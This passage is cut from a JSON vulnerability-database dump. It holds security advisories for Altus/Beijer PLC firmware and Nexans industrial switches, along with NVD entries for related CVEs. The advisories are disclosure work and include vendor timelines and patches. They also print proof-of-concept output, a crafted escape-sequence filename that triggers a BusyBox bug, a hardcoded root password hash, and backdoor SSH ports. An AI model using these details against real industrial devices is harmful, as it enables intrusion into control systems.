Kernel 4.9.98\nOpenSSH 5.9p1\nOpenSSL 1.0.0g\nOpenSSL 1.1.1b (in CODESYS)\nCODESYS Control 3.5.15\n\nAltus/Beijer NX30xx:\nBusyBox 1.1.3\nDropbear SSH 0.45\nGNU glibc 2.5\nlighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998\nLinux Kernel 2.6.23\nOpenSSL 0.9.8g\nOpenSSL 1.1.1b (in CODESYS)\nCODESYS Control 3.5.15\n\nAltus/Beijer HX30xx:\nBusyBox 1.19.4\nGNU glibc 2.11.1\nlighttpd 1.4.30\nLinux Kernel 3.0.75\nOpenSSH 5.9p1\nOpenSSL 1.0.0g\nOpenSSL 1.0.2j (in CODESYS)\nCODESYS Control 3.5.12.65\n\nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on\nan emulated device:\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing <TAB>\"\ntest\n55\\;test.txt\n#\n-------------------------------------------------------------------------------\n\nThe vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device\nby using the MEDUSA scalable firmware runtime.\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions have been found to be vulnerable:\nAltus/Beijer Nexto NX3003 / 1.8.11.0\nAltus/Beijer Nexto NX3004 / 1.8.11.0\nAltus/Beijer Nexto NX3005 / 1.8.11.0\nAltus/Beijer Nexto NX3010 / 1.8.3.0\nAltus/Beijer Nexto NX3020 / 1.8.3.0\nAltus/Beijer Nexto NX3030 / 1.8.3.0\nAltus/Beijer Nexto Xpress XP300 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP315 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP325 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP340 / 1.8.11.0\nAltus/Beijer Hadron Xtorm HX3040 / 1.7.58.0\n\nThe following versions are also vulnerable according to the vendor:\nAltus/Beijer Nexto NX5100 / 1.8.11.0\nAltus/Beijer Nexto NX5101 / 1.8.11.0\nAltus/Beijer Nexto NX5110 / 1.1.2.8\nAltus/Beijer Nexto NX5210 / 1.1.2.8\n\nVendor contact timeline:\n------------------------\n2020-05-25: Contacting VDE CERT through [email\u00a0protected] Received\n confirmation from VDE CERT.\n2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT.\n VDE CERT contacts said, that the vendor did not respond on any\n messages or calls.\n2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer\n Electronics. No answer.\n2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated\n that no case regarding vulnerabilities were opened and created one.\n The product owners of Westermo, Korenix and Beijer Electronics were\n informed via this inquiry. Set disclosure date to 2020-11-25.\n2020-10-06: Restarted the whole responsible disclosure process by sending a\n request to the new security contact [email\u00a0protected]\n2020-11-11: Asked the representatives of Korenix and Beijer regarding the\n status. No answer.\n2020-11-25: Phone call with security manager of Beijer. Sent advisories via\n encrypted archive to [email\u00a0protected] Received\n confirmation of advisory receipt. Security manager told us that he\n can provide information regarding the time-line for the patches\n within the next two weeks.\n2020-12-09: Asked for an update.\n2020-12-18: Call with security manager of Beijer. Vendor presented initial\n analysis done by the affected companies, also Altus. Preliminary\n plans to fix the vulnerabilities were presented. Altus stated to\n fix issue #1 in January and the other vulnerabilities in March or\n April.\n2021-03-21: Security manager invited SEC Consult to have a status meeting.\n2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to\n Altus employees will be done in April. Vendor released fixed\n firmware regarding issue #1.\n2021-04-09: Meeting with Altus. Vendor did not agree with another potentially\n vulnerability, which was identified on the emulated device. Thus,\n it was removed from the advisory. Vulnerabilities #2 and #3 were\n planned to be fixed earlier this year but the releases shifted due\n to Covid. The new firmware version will be released in July 2021.\n2021-04-22: Asked for an update; No answer.\n2021-05-04: Asked for an update.\n2021-05-07: Vendor was working on the security fixes.\n2021-05-11: Vendor sent timeline for fixes and detailed version information.\n Two additional models were added to the affected devices by the\n vendor.\n2021-06-10: Added additional information and asked if more time will be needed.\n2021-06-10: Vendor added affected version numbers and asked for the 1st of\n August as new release date.\n2021-06-15: Set the release date to 1st of August.\n2021-07-28: Vendor sent the version numbers for the fixed firmware and asked\n for postponing the release to 6th of August for completing the\n documentation.\n2021-08-16: Due to holiday, the SEC Consult Vulnerability was closed. Informed\n vendor to release the advisory in the next four days.\n2021-08-17: Received CVE IDs.\n2021-08-18: Informed vendor to release the advisory on 2021-08-19.\n2021-08-19: Coordinated release of security advisory.\n\nSolution:\n---------\nAccording to the vendor the following patches must be applied to fix issue 1),\n2) and 3):\n\nXP300 - v1.11.2.0\nXP315 - v1.11.2.0\nXP325 - v1.11.2.0\nXP340 - v1.11.2.0\nBCS-NX3003 - v1.11.2.0\nBCS-NX3004 - v1.11.2.0\nBCS-NX3005 - v1.11.2.0\nBCS-NX3010 - v1.9.1.0\nBCS-NX3020 - v1.9.1.0\nBCS-NX3030 - v1.9.1.0\nBCS-NX5100 - v1.11.2.0\nBCS-NX5101 - v1.11.2.0\nBCS-NX5110 - v1.11.2.0\nBCS-NX5210 - v1.11.2.0\nBCS-HX3040 - v1.11.2.0\n\nVendor's statement regarding issue 4):\n\"Altus continuously integrates new features and fixes in the products,\nreleasing new firmware versions. Often those improvements require the software\npackages upgrading for several reasons, including security. When this happens,\nwe perform a set of tests to ensure that the performance, reliability, and\nsecurity were not negatively impacted by the upgrades. Although there are known\nvulnerabilities in some software package versions, those vulnerabilities can\nonly be exploited if we compile those specific features and provide the means\nto exploit them. The issue pointed out by SEC Consult, for instance, requires a\nterminal to be exploited, which we don't provide in real hardware. Nowadays,\nthere isn't any known exploitable vulnerability caused by outdated software\npackages in our products. Therefore, this item isn\u2019t considered a vulnerability\nby us.\"\n\n\nWorkaround:\n-----------\nRestrict network access to the device.\n", "sourceHref": "https://0day.today/exploit/36662", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-22T17:43:36", "description": "Nexans FTTO GigaSwitch industrial/office switches HW version 5 suffer from having a hardcoded backdoor user and multiple outdated vulnerable software components.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T00:00:00", "type": "zdt", "title": "Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547", "CVE-2015-9261", "CVE-2017-16544", "CVE-2022-32985"], "modified": "2022-06-21T00:00:00", "id": "1337DAY-ID-37806", "href": "https://0day.today/exploit/description/37806", "sourceData": "=======================================================================\n title: Hardcoded Backdoor User and Outdated Software Components\n product: Nexans FTTO GigaSwitch industrial/office switches HW version 5\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: V6.02N, V7.02\n CVE number: CVE-2022-32985\n impact: High\n homepage: https://www.nexans.com/\n found: 2020-05-25\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a global player in the cable industry, Nexans is behind the scenes\ndelivering the innovative services and resilient products that carry thousands\nof watts of energy and terabytes of data per second around the world. Millions\nof homes, cities, businesses are powered every day by Nexans\u2019 high-quality\nsustainable cabling solutions. We help our customers meet the challenges they\nface in the fields of energy infrastructure, energy resources, transport,\nbuildings, telecom and data, providing them with solutions and services for the\nmost complex cable applications in the most demanding environments.\"\n\nSource: https://www.nexans.com/company/What-we-do.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Outdated Vulnerable Software Components\nA static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that\nare used in the devices' firmware. Four of them were verified by using the\nMEDUSA scalable firmware runtime.\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nA hardcoded root user was found in \"/etc/passwd\". In combination with the\ninvoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port\n50201 and 50200 to login on a system shell.\n\n\nProof of concept:\n-----------------\n1) Outdated Vulnerable Software Components\nBased on an automated scan with the IoT Inspector (ONEKEY) the following third party\nsoftware packages were found to be outdated:\n\nFirmware version 6.02L:\nBusyBox 1.20.2\nDropbear SSH 2012.55\nGNU glibc 2.17\nlighttpd 1.4.48\nOpenSSL 1.0.2h\n\nThe following CVEs were verified with MEDUSA scalable firmware emulation:\n\n* CVE-2015-9261 (Unzip)\nThe crafted ZIP archive \"x_6170921383890712452.bin\" was taken from:\nhttps://www.openwall.com/lists/oss-security/2015/10/25/3\nExecution inside the firmware emulation:\n\nbash-4.2# unzip x_6170921383890712452.bin\nArchive: x_6170921383890712452.bin\n inflating: ]3j\u00bdr\u00abIK-%Ix\ndo_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc\nepc = 0044bb28 in busybox[400000+99000]\nra = 0044b968 in busybox[400000+99000]\nSegmentation fault\n\n\n* CVE-2015-0235 (gethostbyname \"GHOST\" buffer overflow)\n\nPoC code was taken from:\nhttps://gist.github.com/dweinstein/66e6a088191ac0e8105c\n\n\n* CVE-2015-7547 (getaddrinfo buffer overflow)\n\nPoC code was taken from:\nhttps://github.com/fjserna/CVE-2015-7547\n\n-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &\n[1] 259\n-bash-4.4# chroot /medusa_rootfs/ bin/bash\nbash-4.2# cd /medusa_exploits/\nbash-4.2# ./cve-2015-7547_glibc_getaddrinfo\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nConnected with 127.0.0.1:34356\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\n[TCP] Request2 len recv 36\nSegmentation fault\n\n\n* CVE-2017-16544 (shell autocompletion vulnerability)\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing <TAB>\"\ntest\n]55;test.txt\n#\n-------------------------------------------------------------------------------\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nThe hardcoded system user, reachable via the dropbear SSH daemon was found due\nto multiple indications on the system. The undocumented root user itself was\ncontained in the \"passwd\" file:\n\nContent of the file \"/etc/passwd\".\n-------------------------------------------------------------------------------\nroot:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh\n[...]\n-------------------------------------------------------------------------------\n\nA suspicious port for the SSH daemon was chosen in the config file of dropbear:\n\nContent of the file \"/etc/init.d/dropbear\":\n-------------------------------------------------------------------------------\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\nDAEMON=/usr/sbin/dropbear\nNAME=dropbear\nDESC=\"Dropbear SSH server\"\nPIDFILE=/var/run/dropbear.pid\n\nDROPBEAR_PORT=\"50200 -p 50201\"\n[...]\n-------------------------------------------------------------------------------\n\nThis is invoked from \"/usr/lib/libnx_apl.so.0.0.0\", which can be seen in the\nfollowing pseudo-code:\n-------------------------------------------------------------------------------\nvoid dropbear_server_init(char param_1)\n\n{\n __pid_t __pid;\n char *pcVar1;\n int aiStack16 [2];\n\n __pid = fork();\n if (__pid == 0) {\n __pid = fork();\n if (__pid != 0) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n if (param_1 == '\\0') {\n pcVar1 = \"/etc/init.d/dropbear stop\";\n }\n else {\n pcVar1 = \"/etc/init.d/dropbear start\"; <---\n }\n execl(\"/bin/sh\",\"sh\",&DAT_2cd91564,pcVar1,0);\n }\n else {\n waitpid(__pid,aiStack16,0);\n }\n return;\n}\n-------------------------------------------------------------------------------\n\n\nThis function is called if a specific command is issued in the CLI interface:\n-------------------------------------------------------------------------------\n[...]\n iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),\"ssh\",2);\n if (iVar6 != 0) {\n if (param_2 < 4) {\n netbuf_fwd_sprintf(param_1,\"\\r\\n%%Error: Parameter missing\\r\\n\");\n iVar6 = shared_mem_get_addr(&var_shm);\n iVar7 = shared_mem_get_addr(&var_shm);\n uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);\n shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"start\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\x01'); <---\n netbuf_fwd_sprintf(param_1,\"Starting dropbear...\\r\\n\");\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"stop\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\0'); <---\n netbuf_fwd_sprintf(param_1,\"Stopping dropbear...\\r\\n\");\n return;\n }\n netbuf_fwd_sprintf(param_1,\"Uknown dropbear command...\\r\\n\");\n return;\n[...]\n-------------------------------------------------------------------------------\nThe mentioned library is used in the CLI program that is running on the device.\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions have been tested:\n\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M\n\n\nVendor contact timeline:\n------------------------\n2020-05-28: Contacting the vendor's PSIRT under the following link:\n http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail\n No answer.\n2020-06-08: Contacting vendor again via [email\u00a0protected] Extended\n deadline by 11 days.\n2020-06-16: Telephone call with Nexans representative. Security advisory was\n received. It will be reviewed to confirm the found issues.\n2020-06-26: Telephone call with Nexans representative. Nexans is working on the\n reported issues and will remove the dropbear daemon as first\n measure.\n2020-08-04: Vendor stated that a fix for the outdated software components will\n be available in November.\n2020-11-12: Asked for status update.\n2020-11-16: Contact stated, that firmware test will need more time. Updates are\n estimated to be ready in Q1 of 2020.\n2020-11-20: Vendor confirmed Q1 as estimated disclosure date.\n2021-01-21: Asked for status update; Vendor stated that the release with all\n fixes is aimed to be published end of Q1.\n2021-03-09: Asked for status update.\n2021-03-17: Vendor stated that the firmware is in testing stage. The fixed\n firmware will be released in May.\n2021-06-10: Asked for status update.\n2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and\n homeschooling. The fixed firmware will be released end of August.\n2021-08-31: Asked for status update.\n2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.\n2022-05-23: Informed vendor that the advisory will be released mid of June 2022.\n2022-05-24: Firmware V7.02 is available for download which fixes most outdated\n components issues.\n2022-06-15: Release of security advisory.\n\n\nSolution:\n---------\nThe vendor provides an updated firmware here:\nhttps://www.nexans-ans.de/support/firmware/\n\nFirmware version V6.02N has the backdoor removed and was already published a while ago.\nVersion V7.02 also has the backdoor removed and most of the outdated software issues.\n", "sourceHref": "https://0day.today/exploit/37806", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:02:45", "description": "Authenticated Semi-Blind Command Injection (via Parameter Injection) exists on Altus Nexto, Nexto Xpress, and Hadron Xtorm devices via the getlogs.cgi tcpdump feature. This affects Nexto NX3003 1.8.11.0, Nexto NX3004 1.8.11.0, Nexto NX3005 1.8.11.0, Nexto NX3010 1.8.3.0, Nexto NX3020 1.8.3.0, Nexto NX3030 1.8.3.0, Nexto NX5100 1.8.11.0, Nexto NX5101 1.8.11.0, Nexto NX5110 1.1.2.8, Nexto NX5210 1.1.2.8, Nexto Xpress XP300 1.8.11.0, Nexto Xpress XP315 1.8.11.0, Nexto Xpress XP325 1.8.11.0, Nexto Xpress XP340 1.8.11.0, and Hadron Xtorm HX3040 1.7.58.0.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-23T05:15:00", "type": "cve", "title": "CVE-2021-39244", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39244"], "modified": "2021-08-26T19:13:00", "cpe": ["cpe:/o:altus:nexto_nx3020_firmware:1.8.3.0", "cpe:/o:altus:nexto_nx5100_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3030_firmware:1.8.3.0", "cpe:/o:altus:nexto_xpress_xp325_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx5110_firmware:1.1.2.8", "cpe:/o:altus:nexto_xpress_xp340_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3004_firmware:1.8.11.0", "cpe:/o:altus:nexto_xpress_xp315_firmware:1.8.11.0", "cpe:/o:altus:hadron_xtorm_hx3040_firmware:1.7.58.0", "cpe:/o:altus:nexto_nx5101_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx5210_firmware:1.1.2.8", "cpe:/o:altus:nexto_xpress_xp300_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3003_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3010_firmware:1.8.3.0", "cpe:/o:altus:nexto_nx3005_firmware:1.8.11.0"], "id": "CVE-2021-39244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39244", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:altus:nexto_nx3004_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3003_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp340_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp325_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3010_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp315_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5110_firmware:1.1.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3005_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:hadron_xtorm_hx3040_firmware:1.7.58.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5100_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5210_firmware:1.1.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3030_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3020_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp300_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5101_firmware:1.8.11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:02:46", "description": "Hardcoded .htaccess Credentials for getlogs.cgi exist on Altus Nexto, Nexto Xpress, and Hadron Xtorm devices. This affects Nexto NX3003 1.8.11.0, Nexto NX3004 1.8.11.0, Nexto NX3005 1.8.11.0, Nexto NX3010 1.8.3.0, Nexto NX3020 1.8.3.0, Nexto NX3030 1.8.3.0, Nexto NX5100 1.8.11.0, Nexto NX5101 1.8.11.0, Nexto NX5110 1.1.2.8, Nexto NX5210 1.1.2.8, Nexto Xpress XP300 1.8.11.0, Nexto Xpress XP315 1.8.11.0, Nexto Xpress XP325 1.8.11.0, Nexto Xpress XP340 1.8.11.0, and Hadron Xtorm HX3040 1.7.58.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-23T05:15:00", "type": "cve", "title": "CVE-2021-39245", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39245"], "modified": "2021-08-26T19:27:00", "cpe": ["cpe:/o:altus:nexto_nx3020_firmware:1.8.3.0", "cpe:/o:altus:nexto_nx5100_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3030_firmware:1.8.3.0", "cpe:/o:altus:nexto_xpress_xp325_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx5110_firmware:1.1.2.8", "cpe:/o:altus:nexto_xpress_xp340_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3004_firmware:1.8.11.0", "cpe:/o:altus:nexto_xpress_xp315_firmware:1.8.11.0", "cpe:/o:altus:hadron_xtorm_hx3040_firmware:1.7.58.0", "cpe:/o:altus:nexto_nx5101_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx5210_firmware:1.1.2.8", "cpe:/o:altus:nexto_xpress_xp300_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3003_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3010_firmware:1.8.3.0", "cpe:/o:altus:nexto_nx3005_firmware:1.8.11.0"], "id": "CVE-2021-39245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39245", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:altus:nexto_nx3004_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3003_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp340_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp325_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3010_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp315_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5110_firmware:1.1.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3005_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:hadron_xtorm_hx3040_firmware:1.7.58.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5100_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5210_firmware:1.1.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3030_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3020_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp300_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5101_firmware:1.8.11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:02:45", "description": "Cross-Site Request Forgery (CSRF) exists on Altus Nexto, Nexto Xpress, and Hadron Xtorm devices via any CGI endpoint. This affects Nexto NX3003 1.8.11.0, Nexto NX3004 1.8.11.0, Nexto NX3005 1.8.11.0, Nexto NX3010 1.8.3.0, Nexto NX3020 1.8.3.0, Nexto NX3030 1.8.3.0, Nexto NX5100 1.8.11.0, Nexto NX5101 1.8.11.0, Nexto NX5110 1.1.2.8, Nexto NX5210 1.1.2.8, Nexto Xpress XP300 1.8.11.0, Nexto Xpress XP315 1.8.11.0, Nexto Xpress XP325 1.8.11.0, Nexto Xpress XP340 1.8.11.0, and Hadron Xtorm HX3040 1.7.58.0.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-08-23T05:15:00", "type": "cve", "title": "CVE-2021-39243", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39243"], "modified": "2021-08-26T18:37:00", "cpe": ["cpe:/o:altus:nexto_nx3020_firmware:1.8.3.0", "cpe:/o:altus:nexto_nx5100_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3030_firmware:1.8.3.0", "cpe:/o:altus:nexto_xpress_xp325_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx5110_firmware:1.1.2.8", "cpe:/o:altus:nexto_xpress_xp340_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3004_firmware:1.8.11.0", "cpe:/o:altus:nexto_xpress_xp315_firmware:1.8.11.0", "cpe:/o:altus:hadron_xtorm_hx3040_firmware:1.7.58.0", "cpe:/o:altus:nexto_nx5101_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx5210_firmware:1.1.2.8", "cpe:/o:altus:nexto_xpress_xp300_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3003_firmware:1.8.11.0", "cpe:/o:altus:nexto_nx3010_firmware:1.8.3.0", "cpe:/o:altus:nexto_nx3005_firmware:1.8.11.0"], "id": "CVE-2021-39243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:altus:nexto_nx3004_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3003_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp340_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp325_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3010_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp315_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5110_firmware:1.1.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3005_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:hadron_xtorm_hx3040_firmware:1.7.58.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5100_firmware:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx5210_firmware:1.1.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3030_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_nx3020_firmware:1.8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:altus:nexto_xpress_xp300_firmware:1.8.11.0:*:*:*:*:*:*:*", 